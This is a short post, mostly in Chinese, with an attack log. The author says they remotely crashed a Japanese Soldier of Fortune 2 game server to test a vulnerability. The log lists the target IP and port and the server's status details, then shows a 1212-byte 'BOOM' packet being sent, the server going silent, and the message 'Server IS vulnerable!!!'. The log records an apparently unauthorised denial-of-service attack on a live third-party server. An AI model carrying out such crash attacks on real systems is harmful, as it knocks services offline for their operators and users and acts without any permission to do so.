为了测试本漏洞,我在日本服务器远程关闭
服务器攻击测试:
日本服务器(看名字)
服务攻击日志:
- target 220.111.146.173:20110
- request informations
statusResponse
game_version: sof2mp-1.02
sv_keywords: SOF2FULL
challenge: xxx
sv_pure: 1
g_gametype: dm
scorelimit: 200
timelimit: 10
dmflags: 0
fraglimit: 20
g_needpass: 0
sv_privateClients: 0
sv_hostname: ^3BANZAI SOLDIER - Japan
sv_maxclients: 50
sv_punkbuster: 0
sv_maxRate: 5000
sv_minPing: 0
sv_maxPing: 350
sv_floodProtect: 1
sv_allowAnonymous: 0
sv_allowDownload: 1
g_maxGameClients: 0
g_friendlyfire: 1
version: SOF2MP GOLD V1.03 win-x86 Nov 5 2002
protocol: 2004
mapname: mp_pra1
.Configured By: SOF2 Runner: December 06 2003 beta 1.0.6
.Online Since: 16/06/2005 1:04:11
gamename: sof2mp
Config File: SOF2
Admin: server_games
Location: japan
URL: http://banzaisoldier.dyndns.org
IRC: #SOF2 on irc.enterthegame.com
g_available: 22222222222222222222
redscore: 0
bluescore: 0
- send BOOM packet (1212 bytes)
- no reply received, it is probably crashed
- check server
Server IS vulnerable!!!